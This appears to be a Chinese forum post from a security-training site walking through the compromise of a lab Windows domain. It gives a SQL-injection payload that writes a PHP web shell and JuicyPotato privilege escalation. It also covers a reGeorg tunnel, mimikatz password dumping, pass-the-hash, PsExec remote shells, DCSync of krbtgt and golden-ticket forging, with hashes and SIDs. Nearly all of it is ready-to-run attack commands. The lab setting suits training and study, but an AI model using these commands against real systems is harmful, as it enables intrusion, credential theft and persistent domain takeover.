id=7 union select 1,'<?php eval($_REQUEST[8])?>' into outfile 'c:/phpstudy/www/125.php'
函数(相当于数据库备份):
into outfile、into dumpfile
cmd基本命令net user 账号 密码 /add
(新建账号密码)net user 账号 密码
(修改账号密码)Whoami
(查看用户权限)netstat -ano
(查看本机开放的端口)Tasklist
(查看本机运行的程序[类似于任务管理器])Systeminfo
(查看计算机信息)net localgroup administrators /add
(提权到管理员组)
查看windows打了什么补丁,然后去网上找存在什么样的漏洞,然后找对应的提权工具。
网址: https://bugs.hacking8.com/tiquan/
原版:JuicyPotato.exe -t * -p c:\windows\system32\cmd.exe -l 1111 -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
魔改:JuicyPotato.exe -p “whomai”
JuicyPotato.exe -p “whomai”
JuicyPotato.exe -p “net user 账号 密码 /add”
JuicyPotato.exe -p “net localgroup administrators 账号 /add”
python reGeorgSocksProxy.py -l 127.0.
0.1 -p 10086 -u http://afsgr16-b1ferw.aqlab.cn/110.php
代理服务器设置为127.0.0.1,端口为10086
访问规则设置为mstsc.exe,(标识只监视远程桌面连接的流量)
进入内网,打开猕猴桃软件,进行提权,获取管理员密码privilege::debug
(提升权限)Log
(生成日志)sekurlsa::logonpasswords
(抓取密码)
登录内网10.0.1.8,在继续进行猕猴桃提权。privilege::debug
(提升权限)Log
(生成日志)sekurlsa::logonpasswords
(抓取密码)
发现生成密码为加密的
利用cmd指令systeminfo
,查看本机信息,发现本机在(zkaq.cn)域控机器范围内
上猕猴桃sekurlsa::logonpasswords
(抓取密码)sekurlsa::pth /user:administrator /domain:"zkaq.cn" /ntlm:61465a991b168727b65b3644aab823cd
(登陆用户 域地址 ntlm加密值)
dir \dc.zkaq.cn\c$【查看域控C盘】
PsExec.exe \\dc.zkaq.cn cmd
([他会去调用域控主机的cmd])
net user 账号 密码 /add
net localgroup administrators 账号 /add
在来查询域控主机IP地址10.0.1.6
在上猕猴桃lsadump::dcsync /user:krbtgt
获取krbtgt的密码 [mimikatz 会模拟域控,向目标域控请求账号密码信息]
获得sid和krbtgt的值。就可以退出域控主机了,但还必须处在内网中。
返回10.0.1.8网络。
在猕猴桃处制作黄金票据:kerberos::golden /admin:administrator /domain:zkaq.cn /sid:S-1-5-21-1720693672-3610745784-2269473857 /krbtgt:1176ad25a126d316ed5ea4b60b3d71dd /ticket:administrator.kiribi
[制作票据] (注意不要502)
kerberos::ptt administrator.kiribi
[加载票据]
就可以访问域控了,
只要黄金票据存在,
以后就可以直接[加载票据],进行PsExec.exe在cmd窗口进行域控提权,就遨游内网。
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
veek | 30.00 | 0 | 2021-01-25 17:05:10 | 有图了再给你加钱 |
打赏我,让我更有动力~
© 2016 - 2023 掌控者 All Rights Reserved.